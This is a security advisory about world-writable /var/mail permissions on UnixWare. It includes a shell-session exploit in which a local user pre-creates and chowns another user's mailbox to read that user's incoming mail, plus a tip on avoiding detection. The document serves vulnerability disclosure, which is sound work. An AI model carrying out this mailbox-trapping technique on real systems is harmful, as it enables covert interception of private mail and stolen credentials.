Under UnixWare any user can read/modify others' mail, due to misconfigured permission settings on the /var/mail directory (it is set to 777 by default, which allows anyone to create directories under it).
Credit:
The information has been provided by: Brock Tellier.
'/var/mail' is set by default to mode 777. As such, any user may create a file called '/var/mail/<username>' with a mode readable by him and trap all incoming mail. Afraid of getting caught? chown the file to <username>, leaving it still world-readable, and no one will ever know who did it.
All of this assumes, of course, that the user has not received any mail yet. By keeping track of your /etc/passwd file, the attacker can monitor for new entries and create the files as needed.
This permissions problem obviously opens the door for all sorts of problems with symlinks and such. Some mail delivery programs which aren't as smart as sendmail will follow symlinks in '/var/mail', causing a security vulnerability.
Exploit:
bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier
Now wait for btellier to get some mail?
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier
bash-2.02$ cat btellier
(note: the character '>' was added for readability)
>From root Sat Dec 4 07:55:29 1999
>Return-Path: root
>Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842
>for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
>Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
>From: root@localhost
>Message-Id: <199912041355.HAA04842@localhost>
>Status:
>X-Status:
>X-SCO-PAD: XXXXXX
>X-SCO-UID: 1
>Content-Length: 52
>your super-secure password on 0wned.com is a@f9;se0
bash-2.02$
